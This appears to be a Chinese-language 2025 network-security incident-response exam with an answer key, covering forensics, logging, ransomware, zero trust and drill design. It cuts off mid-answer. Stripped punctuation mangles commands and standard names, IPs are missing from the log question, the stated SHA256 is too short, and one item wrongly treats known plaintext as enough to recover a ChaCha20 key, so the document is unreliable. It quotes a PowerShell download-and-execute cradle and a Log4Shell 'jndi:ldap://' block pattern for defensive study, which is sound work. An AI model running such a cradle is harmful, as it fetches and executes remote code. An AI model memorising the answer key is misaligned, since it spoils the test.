2025年网络安全应急响应测试卷及答案

2025年网络安全应急响应测试卷及答案1.单项选择题（每题1分，共20分。每题只有一个正确答案，错选、多选均不得分）1.12024年12月，某省政务云发生大规模数据泄露事件，初步溯源发现攻击者利用的入口是A.VPN设备0day漏洞B.运维堡垒机弱口令C.容器镜像仓库配置错误D.第三方日志分析平台APIKey泄露1.2在WindowsServer2022中，通过“事件查看器”定位到事件ID4624，其含义为A.账户登录失败B.账户成功登录C.权限提升成功D.服务启动失败1.3某企业采用零信任架构，当用户首次访问财务系统时，策略引擎最先触发的组件是A.SIEMB.PolicyAdministrationPointC.SecureWebGatewayD.MicrosegmentationController1.4根据《GB/T302792020信息安全技术网络安全事件分类分级指南》，造成“省级重要业务系统中断4小时”应定为A.特别重大事件（Ⅰ级）B.重大事件（Ⅱ级）C.较大事件（Ⅲ级）D.一般事件（Ⅳ级）1.5在Linux取证中，可用于快速提取进程内存并生成ELF格式转储文件的命令是A.ddif=/proc/$PID/memB.gcoreodump$PIDC.memdumpp$PIDD.volatilityfmem.raw–profile=Linux1.6某勒索软件样本采用ChaCha20+RSA加密，下列关于其密钥生命周期描述正确的是A.RSA公钥硬编码在样本内，私钥由C2动态下发B.ChaCha20密钥加密文件后立刻清零内存C.每个文件使用相同ChaCha20密钥D.RSA私钥通过ECC临时会话密钥加密回传1.7在DNS隧道检测中，下列统计指标对“长会话”特征最敏感的是A.子域名熵值B.查询报文长度方差C.域名生存时间（TTL）均值D.每小时唯一域名计数1.8某云原生环境使用Kubernetes1.29，以下哪条RoleBinding可让ServiceAccount“monitor”仅读取default命名Pod日志A.apiGroups:[""],resources:["pods/log"],verbs:["get","list"]B.apiGroups:["apps"],resources:["pods"],verbs:["get"]C.apiGroups:[""],resources:["pods"],verbs:["watch"]D.apiGroups:["logs"],resources:[""],verbs:["get"]1.9在HTTP/3中，攻击者利用QUIC重放0RTT数据包可触发的风险是A.服务器侧拒绝服务B.用户会话劫持C.幂等请求重放导致数据不一致D.证书透明日志泄露1.10某SOC收到告警“ETPOLICYDNSQueryfor.topTLD”，为降低误报，最有效的上下文enrichment数据是A.目标IP历史WhoisB.终端EDR进程树C.防火墙NAT会话D.邮件网关DLP日志1.11根据《个人信息保护法》，当数据主体提出删除请求时，应急响应团队可不执行删除的情形是A.数据已匿名化B.数据为执法机关要求留存C.数据已加密D.数据保存期限届满但已脱敏1.12在威胁情报STIX2.1中，表示“攻击者基础设施”的对象类型是A.intrusionsetB.infrastructureC.campaignD.identity1.13某企业采用NIST80061r2应急响应流程，其中“LessonsLearned”阶段输出物不包括A.事件时间线B.证据哈希链C.改进建议清单D.费用成本报告1.14在内存取证中，定位Linux隐藏内核模块（LKM）常用的Volatility插件是A.linux_lsmodB.linux_hidden_modulesC.linux_kmodsD.linux_check_modules1.15某IPS规则“alerttcpanyany>any443(msg:"TLSSNIanomaly";tls.sni;content:".tk";threshold:typelimit,trackby_src,count1,seconds60;)”属于A.协议异常检测B.信誉检测C.阈值限流D.沙箱联动1.16在Windows1123H2中，可阻止无驱动程序加载的勒索软件利用的漏洞缓解措施是A.HVCI（MemoryIntegrity）B.CFGC.SEHOPD.DEP1.17某云函数（Lambda）因依赖库存在Log4j2漏洞被利用，以下哪项日志源最能直接看到JNDI外联A.CloudTrailB.VPCFlowLogsC.LambdaRuntimeLogsD.CloudWatchLogsInsights1.18在工业控制系统（ICS）中，利用Modbus功能码0x5F可造成的后果是A.读取线圈状态B.写单个寄存器C.厂商私有命令，可触发固件升级D.强制监听模式1.19某企业采用MITREATT&CK映射，发现攻击者使用“T1486”技术，其对应行为是A.数据加密影响可用性B.服务停止C.账户发现D.横向移动1.20在应急响应演练中，桌面推演（TTX）与红蓝对抗最大区别是A.是否使用真实流量B.是否涉及高层决策C.是否测试技术检测能力D.是否产生真实业务影响2.多项选择题（每题2分，共20分。每题有两个或两个以上正确答案，多选、少选、错选均不得分）2.1下列属于Log4Shell漏洞应急临时缓解措施的有A.设置Dlog4j2.formatMsgNoLookups=trueB.在WAF添加“jndi:ldap://”阻断规则C.升级JDK至11.0.15D.利用iptables封锁外联53端口E.在DNS服务器返回NXDOMAIN污染外域2.2某员工笔记本感染银行木马“Dridex”，在内存中可观察到的特征有A.进程inject.exe调用SetWindowsHookExB.注册表Run键写入随机8位字符值C.网络连接至端口443但证书自签D.大量Heapspray痕迹E.调用NtQuerySystemInformation获取进程列表2.3关于TLS1.3流量解密，下列说法正确的有A.通过Wireshark可导入SSLKEYLOGFILE解密B.使用RSA密钥交换时可被动解密C.支持0RTT时前向保密仍然有效D.通过eBPF可提取对称密钥E.若采用PSK模式，需预共享密钥才能解密2.4在Linux系统被植入Rootkit后，可用来检测内核级隐藏文件的工具或命令有A.lsla/procB.chkrootkitC.unhideD./proc/kallsyms对比E.debugfsw2.5以下属于云责任共担模型中“云服务方”负责的有A.对象存储底层磁盘擦除B.客户VM内GuestOS补丁C.虚拟化层漏洞修复D.云API认证机制E.用户上传数据内容审核2.6针对“双重勒索”勒索软件，应急响应中必须立即执行的操作有A.隔离受影响主机网络B.关闭所有外网出口防火墙C.对未加密数据做磁盘快照D.强制推送全域口令重置E.通知数据保护监管机构2.7在工业网络中，利用Shodan可检索到的工控协议端口有A.502B.44818C.1911D.2404E.1022.8关于Windows事件日志取证，下列字段可用于关联横向移动的有A.LogonType3B.AuthenticationPackageNTLMC.ProcessNamesvchost.exeD.SourceNetworkAddressE.KeyLength02.9以下属于NISTSP800207零信任架构逻辑组件的有A.PolicyEngineB.PolicyAdministratorC.PolicyEnforcementPointD.ControlPlaneE.DataPlane2.10在Android14取证中，可获取系统级权限签名校验失败绕过的方法有A.magiskpatchboot.imgB.adbroot直接获取C.解锁Bootloader刷入TWRPD.利用CVE202320963提权E.通过系统更新本地升级包签名校验缺陷3.填空题（每空1分，共20分）3.1在Linux系统中，用于查看当前已加载内核模块详细信息的命令是________；若需显示模块作者信息，应加参数________。3.2根据《网络安全法》第________条规定，网络运营者应当制定网络安全事件应急预案。3.3在Volatility框架中，若要对Windows1022H2内存镜像进行profile识别，应使用插件________。3.4某SMTP服务器日志出现“5505.7.1Messagerejectedduetocontentpolicy”，该状态码属于________类SMTP代码。3.5在HTTP响应头中，用于指示浏览器对跨域请求是否允许携带凭证的字段是________。3.6当利用PowerShell执行“InvokeExpression(NewObjectNet.WebClient).DownloadString('/a.ps1')”时，AMSI通过________接口捕获脚本内容。3.7在Kubernetes中，用于限制容器最大可占用内存的资源字段为________。3.8根据ISO/IEC27035，应急响应第一阶段为________。3.9在Snort规则中，用于检测TCP标志位SYN=1、ACK=0、RST=0、FIN=0的写法是________。3.10某域名解析返回的DNSSEC记录类型为________，用于提供数字签名。3.11在Windows注册表中，保存用户最近打开文件记录的主键路径为________。3.12利用tcpdump抓取所有目标端口为8080的HTTP非加密流量，命令为________。3.13在MITREATT&CK中，技术编号T1055代表________。3.14当使用YARA规则匹配PE文件时，用于定位入口点地址的关键字是________。3.15在MySQL8.0中，开启通用查询日志的指令为________。3.16根据《数据安全法》，重要数据处理者应当________开展风险评估。3.17在iOS17取证中，若需提取未加密iTunes备份，可直接解析________文件获取短信数据。3.18在SIEM中，将不同来源日志时间戳统一到UTC的环节称为________。3.19在IPv6中，用于本地链路单播地址的前缀为________。3.20在工业协议S7comm中，Job类型为________的功能码用于读取DB块。4.判断题（每题1分，共10分。正确打“√”，错误打“×”）4.1Windows安全标识符（SID）中，以“S1521”开头的属于本地用户或组。4.2在TLS1.3中，通过EncryptedExtensions消息可看到服务器证书。4.3利用ShodanAPI搜索“port:3389product:MySQL”可定位到RDP服务。4.4在Linux中，/etc/crontab文件权限若被设置为777，属于高危配置。4.5根据《关键信息基础设施安全保护条例》，运营者应在30日内完成等级保护测评整改。4.6在Android中，解锁Bootloader会触发FactoryReset保护，清空用户数据。4.7使用volatility的linux_check_afinfo插件可检测网络层Rootkit。4.8在DNSoverHTTPS（DoH）中，查询内容封装于HTTP/2的HEADER帧。4.9勒索软件采用“间歇加密”可显著降低被EDR检测概率。4.10在NIST80053中，控制项IR9要求建立“事件处理成熟度模型”。5.简答题（共30分）5.1（封闭型，6分）列举Windows系统中可用来持久化的三类注册表键，并给出每类一个具体键路径。5.2（开放型，8分）某电商在2025年3月1日09:00收到客户投诉“订单页面跳转到钓鱼站”。经排查，CDN边缘节点缓存的JavaScript被篡改，植入document.write动态加载恶意域名。请简述完整应急响应流程，并指出关键证据提取点。5.3（封闭型，6分）说明Linux系统遭受“加密挖矿”木马后，如何利用systemdtimer实现持久化，并给出检测命令。5.4（开放型，10分）结合《个人信息保护法》第57条，阐述发生“100万条个人信息泄露”事件后，企业向监管机构提交的事件报告应包含的六大要素，并给出每项内容示例。6.应用题（共60分）6.1日志分析综合题（20分）背景：某高校出口防火墙日志片段（UTC）如下：2025040502:10:12ALLOWtcp8:45632→:22SYN2025040502:10:15ALLOWtcp8:45632→:22ACK2025040502:10:18ALLOWtcp:22→8:45632PSH,ACKlen=362025040502:10:20ALLOWtcp8:45632→:22ACKlen=7682025040502:10:22ALLOWtcp:22→8:45632PSH,ACKlen=522025040502:11:30ALLOWtcp:44444→:443SYN2025040502:11:31ALLOWtcp:443→:44444SYN,ACK2025040502:11:45ALLOWtcp:44444→:443ACKlen=13242025040502:12:00ALLOWudp:53→:53QUERY0x6b12Af3321.top2025040502:12:01ALLOWudp:53→:53RESPONSE0x6b12A问题：（1）指出攻击者最可能利用的初始入口协议与端口。（3分）（2）分析在02:11:30之后的网络行为，判断其是否已失陷，并给出两条依据。（5分）（3）若需对进行磁盘镜像，请写出在关机前必须获取的易失性数据清单（至少四项）。（4分）（4）结合DNS查询，设计一条Snort规则检测后续同类外联。（4分）（5）若f3321.top被确认是C2，请给出两条威胁狩猎思路，用于发现其他受害主机。（4分）6.2恶意样本计算题（20分）背景：获得勒索软件样本unlocked.exe，SHA256：d41d8cd98f00b204e9800998ecf8427e…（略）。经沙箱运行，发现其使用ChaCha20对称密钥K（32字节）加密文件，再用RSA2048公钥加密K生成K_enc（256字节）。已知公钥指数e=65537，模数N=0x00a1b2…（2048位，十六进制，略）。问题：（1）写出从内存转储中定位K_enc的YARA规则关键字。（4分）（2）若已知一个加密文件头16字节密文为C[0..15]，对应明文为“<!DOCTYPEhtml>\n”(ASCII)，请给出恢复K的数学步骤（不要求数值计算，仅写公式与流程）。（6分）（3）假设已恢复K，写出使用OpenSSL命令行解密整个文件的完整指令（输入：encrypted.bin，输出：decrypted.bin，IV前置8字节）。（4分）（4）若企业无备份，请评估支付赎金风险，并从法律、合规、业务三个角度给出决策建议。（6分）6.3应急演练方案设计题（20分）背景：某金融集团拟在2025年6月举行“勒索软件+数据泄露”双场景演练，涉及总部、两地数据中心、50家支行。任务：（1）设计演练目标（SMART原则），至少三条。（3分）（2）绘制演练组织架构图，标注决策、指挥、技术、公关、法务五条线职责。（4分）（3）给出演练时间轴（T30天至T+7天），列出关键里程碑。（5分）（4）设计三项可量化的评估指标，并说明采集方法。（4分）（5）演练后需输出改进报告，请给出报告目录（至少五级标题）。（4分）7.答案与评分标准1.单项选择1.1A1.2B1.3B1.4C1.5B1.6B1.7B1.8A1.9C1.10B1.11B1.12B1.13B1.14B1.15C1.16A1.17C1.18C1.19A1.20D2.多项选择2.1AB2.2ABCE2.3AE2.4BCD2.5ACD2.6ACDE2.7ABDE2.8ABD2.9ABC2.10ACD3.填空3.1lsmod,modinfoa3.2253.3imageinfo3.45XX3.5AccessControlAllowCredentials3.6AmsiScanBuffer3.7limits.memory3.8PlanandPrepare3.9flags:S;3.10RRSIG3.11HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs3.12tcpdumpiany'tcpport8080'whttp.pcap3.13ProcessInjection3.14entrypoint3.15SETGLOBALgeneral_log='ON';3.16定期3.173d0d7e5fb2ce288813306e4d4636395e047a3d283.18TimeNormalization3.19fe80::/103.20Read4.判断4.1√4.2×4.3×4.4√4.5×4.6√4.7√4.8×4.9√4.10×5.简答5.1每类2分，键路径正确得1分。示例：（1）Run键：HKLM\Software\Microsoft\Windows\CurrentVersion\Run（2）Service键：HKLM\System\CurrentControlSet\Services\（3）Winlogon键：HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\Shell5.2流程：事件确认→隔离→溯源→清除→恢复→报告；关键证据：边缘节点缓存日志、JavaScript哈希、CDN配置变更记录、客户侧HAR文件。每点1分，共8分。5.3利用systemdtimer创建/usr/lib/systemd/system/update.service与update.timer，实现@hourly触发；检测：systemctllisttimersall|grepupdate；cat/etc/systemd/system/.timer。命令正确给6分。5.4六大要素：1.事件基本情况（泄露100万条用户注册信息）；2.已采取的措施（隔离、通知）；3.潜在危害（诈骗、身份盗用）；4.初步原因（API未鉴权）；5.数据去向（已出售暗网）；6.下一步计划（强制双因素、补偿用户）。每项2分，示例合理即给分，共10分。6.应用题6.1（1）SSH/22（2）失陷：①内网主机主动外连443